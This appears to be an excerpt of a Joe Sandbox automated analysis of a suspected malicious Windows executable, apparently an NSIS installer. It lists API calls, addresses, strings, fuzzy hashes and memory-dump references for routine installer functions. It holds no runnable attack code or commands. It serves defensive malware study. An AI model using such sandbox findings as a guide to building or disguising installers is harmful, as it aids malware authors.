                                                                                                                    • Opcode Fuzzy Hash: 54eb05019f2e59d002bdcf8ef70b12416628f11d58b5efd06b79a11da1a785d5
                                                                                                                    • Instruction Fuzzy Hash: 19510874D00219ABDF209F94CA88ABEB779FF04344F50447BE501B72E0D7B99942DB69
                                                                                                                    APIs
                                                                                                                    • DestroyWindow.USER32(00000000,00000000), ref: 00402DBA
                                                                                                                    • GetTickCount.KERNEL32 ref: 00402DD8
                                                                                                                    • wsprintfW.USER32 ref: 00402E06
                                                                                                                      • Part of subcall function 004052E2: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 0040531A
                                                                                                                      • Part of subcall function 004052E2: lstrlenW.KERNEL32(00402E19,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 0040532A
                                                                                                                      • Part of subcall function 004052E2: lstrcatW.KERNEL32(Completed,00402E19,00402E19,Completed,00000000,00000000,00000000), ref: 0040533D
                                                                                                                      • Part of subcall function 004052E2: SetWindowTextW.USER32(Completed,Completed), ref: 0040534F
                                                                                                                      • Part of subcall function 004052E2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405375
                                                                                                                      • Part of subcall function 004052E2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538F
                                                                                                                      • Part of subcall function 004052E2: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040539D
                                                                                                                    • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402E2A
                                                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 00402E38
                                                                                                                      • Part of subcall function 00402D83: MulDiv.KERNEL32(0048C46E,00000064,004923B0), ref: 00402D98
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                    • String ID: ... %d%%
                                                                                                                    • API String ID: 722711167-2449383134
                                                                                                                    • Opcode ID: 76c6048a3b7cbdf23ef159d9fff81f0a9f13728c5e7eb0bec8d1179ea8a0becc
                                                                                                                    • Instruction ID: 2b011a82625418f68b8499a5732cb5b9e1a166e3b6ac7890347db752d15f278b
                                                                                                                    • Opcode Fuzzy Hash: 76c6048a3b7cbdf23ef159d9fff81f0a9f13728c5e7eb0bec8d1179ea8a0becc
                                                                                                                    • Instruction Fuzzy Hash: D7015230541624E7C6216B60EE4DA9B7668AF00B05B24407BF845F11E1DAB85455CBEE
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BC7
                                                                                                                    • GetMessagePos.USER32 ref: 00404BCF
                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00404BE9
                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404BFB
                                                                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C21
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$Send$ClientScreen
                                                                                                                    • String ID: f
                                                                                                                    • API String ID: 41195575-1993550816
                                                                                                                    • Opcode ID: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                                    • Instruction ID: 2ee92d30c3d4f62541dcb72b74cb9552329c9a0a7836ec50a82d95606e957567
                                                                                                                    • Opcode Fuzzy Hash: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                                    • Instruction Fuzzy Hash: 33015E71900218BAEB10DBA4DD85FFEBBBCAF54711F10412BBA51B61D0D7B4AA058BA4
                                                                                                                    APIs
                                                                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
                                                                                                                    • wsprintfW.USER32 ref: 00402D56
                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00402D66
                                                                                                                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D78
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                    • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                    • API String ID: 1451636040-1158693248
                                                                                                                    • Opcode ID: 341d5f173f72d28821ee7b690774ab615ca69fb47453f4e2e3432960910f7c7f
                                                                                                                    • Instruction ID: dce893d37650e0a5fad71f20df5db28da565fcefcb4dd95a10239a167aca93fc
                                                                                                                    • Opcode Fuzzy Hash: 341d5f173f72d28821ee7b690774ab615ca69fb47453f4e2e3432960910f7c7f
                                                                                                                    • Instruction Fuzzy Hash: 19F0367050020DABEF206F60DD49BEA3B69EF04309F00803AFA55B51D0DFBD59558F59
                                                                                                                    APIs
                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
                                                                                                                    • GlobalFree.KERNEL32(?), ref: 004028E9
                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00402914
                                                                                                                    • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2667972263-0
                                                                                                                    • Opcode ID: c17071a172e6611300c6e5c6d8e6fb9818479fdaec624330b34eaa9cfd7f242d
                                                                                                                    • Instruction ID: f14c02afffa7b7907a5fd564506058e77daa58a1031cefc6daed455ed9e34e83
                                                                                                                    • Opcode Fuzzy Hash: c17071a172e6611300c6e5c6d8e6fb9818479fdaec624330b34eaa9cfd7f242d
                                                                                                                    • Instruction Fuzzy Hash: FC216F72800118BBCF216FA5CE49D9E7E79EF09324F24423AF550762E0CB795E41DB98
                                                                                                                    APIs
                                                                                                                    • lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B3F
                                                                                                                    • wsprintfW.USER32 ref: 00404B48
                                                                                                                    • SetDlgItemTextW.USER32(?,00423748), ref: 00404B5B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                                                                    • String ID: %u.%u%s%s$H7B
                                                                                                                    • API String ID: 3540041739-107966168
                                                                                                                    • Opcode ID: 2c37dc16e7f305192eed0ac62bbfad02487635509ea4f811ded0739848cee536
                                                                                                                    • Instruction ID: bb4960df2745a4ac69d0d477934f6cb15a160bb02a324f12832b476a5784c287
                                                                                                                    • Opcode Fuzzy Hash: 2c37dc16e7f305192eed0ac62bbfad02487635509ea4f811ded0739848cee536
                                                                                                                    • Instruction Fuzzy Hash: 3611D873A441283BEB10656D9C45F9E329CDB81334F254237FA26F61D1E979D82146EC
                                                                                                                    APIs
                                                                                                                    • WideCharToMultiByte.KERNEL32(?,?,artikulationer\Udsorteringerne,000000FF,C:\Users\user\AppData\Local\Temp\nsp7359.tmp\nsExec.dll,00000400,?,?,00000021), ref: 00402583
                                                                                                                    • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsp7359.tmp\nsExec.dll,?,?,artikulationer\Udsorteringerne,000000FF,C:\Users\user\AppData\Local\Temp\nsp7359.tmp\nsExec.dll,00000400,?,?,00000021), ref: 0040258E
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWidelstrlen
                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsp7359.tmp\nsExec.dll$artikulationer\Udsorteringerne
                                                                                                                    • API String ID: 3109718747-2373012318
                                                                                                                    • Opcode ID: 35ecabcbfaf6731e74d8ae70dbfedeb1cffa6cf56a096f4227e0e6c723131c42
                                                                                                                    • Instruction ID: 3fd77634d05d68e607a2feda7018aaef600362da1068c31595f6dded202503df
                                                                                                                    • Opcode Fuzzy Hash: 35ecabcbfaf6731e74d8ae70dbfedeb1cffa6cf56a096f4227e0e6c723131c42
                                                                                                                    • Instruction Fuzzy Hash: 33112772A01204BBDB10AFB18F4AA9F32669F54344F20403BF402F61C1DAFC8E91566E
                                                                                                                    APIs
                                                                                                                    • GetDlgItem.USER32(?,?), ref: 00401D00
                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                                                                                    • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                                                                                    • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1849352358-0
                                                                                                                    • Opcode ID: 26223df348314c12187df1a3a086258d1616f78344ebc1c33a08eb5c9aa33e1f
                                                                                                                    • Instruction ID: 2dd82fd711e3e4b5423ea32521429725dc25e45d8003ad5609f7a78d81fa071f
                                                                                                                    • Opcode Fuzzy Hash: 26223df348314c12187df1a3a086258d1616f78344ebc1c33a08eb5c9aa33e1f
                                                                                                                    • Instruction Fuzzy Hash: A7F0E172600504AFDB01DBE4DE88CEEBBBDEB48311B104476F541F51A1CA759D418B38
                                                                                                                    APIs
                                                                                                                    • GetDC.USER32(?), ref: 00401D59
                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                                                                                                    • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                                                                                                    • CreateFontIndirectW.GDI32(0040CE00), ref: 00401DD1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3808545654-0
                                                                                                                    • Opcode ID: 9d7988e3cd0506f91b59542dc0528f3f2e9c950226118d3629809f720825c0ab
                                                                                                                    • Instruction ID: 540f35f5a36947b42322164f575acfe4ce77a432ba8ecb6b2d0148fd83f79f8e
                                                                                                                    • Opcode Fuzzy Hash: 9d7988e3cd0506f91b59542dc0528f3f2e9c950226118d3629809f720825c0ab
                                                                                                                    • Instruction Fuzzy Hash: EF01A231544640EFE7015BB0EF4EB9A3F74A7A5341F144579F941B62E2CAB801258BAD
                                                                                                                    APIs
                                                                                                                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                                                                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Timeout
                                                                                                                    • String ID: !
                                                                                                                    • API String ID: 1777923405-2657877971
                                                                                                                    • Opcode ID: 11d4d904bb71dbb966a0ad9f723e74c8a428a9d9267570d3682b579917bfb7b7
                                                                                                                    • Instruction ID: 8c23cbaaf3363c844559deeab64a920cb4d6fb7c8214554dffc13efcda3ce685
                                                                                                                    • Opcode Fuzzy Hash: 11d4d904bb71dbb966a0ad9f723e74c8a428a9d9267570d3682b579917bfb7b7
                                                                                                                    • Instruction Fuzzy Hash: FF219271940105BEEF01AFB4CE4AABE7B75EB44344F10403EF641B61D1D6B89A40D769
                                                                                                                    APIs
                                                                                                                    • CharNextW.USER32(?,?,00425F50,Error writing temporary file. Make sure your temp folder is valid.,00405C56,00425F50,00425F50, 4ou.ou,?,756F2EE0,00405994,?,756F3420,756F2EE0,"C:\Users\user\Desktop\RmIYOfX0yO.exe"), ref: 00405BF0
                                                                                                                    • CharNextW.USER32(00000000), ref: 00405BF5
                                                                                                                    • CharNextW.USER32(00000000), ref: 00405C0D
                                                                                                                    Strings
                                                                                                                    • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00405BE2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CharNext
                                                                                                                    • String ID: Error writing temporary file. Make sure your temp folder is valid.
                                                                                                                    • API String ID: 3213498283-4064111799
                                                                                                                    • Opcode ID: f220efeea37ee359dd6515a544f61222e30bb784142ca8a223f370c395045e43
                                                                                                                    • Instruction ID: 8ad88def47e2d38867cf9e91343d20e41dbac1805b4d4da5c0653217526e5d7e
                                                                                                                    • Opcode Fuzzy Hash: f220efeea37ee359dd6515a544f61222e30bb784142ca8a223f370c395045e43
                                                                                                                    • Instruction Fuzzy Hash: 2FF06261918F1D56EB317A584C55A7756B8EB96350B04843BD741B71C0D3BC48818EE9
                                                                                                                    APIs
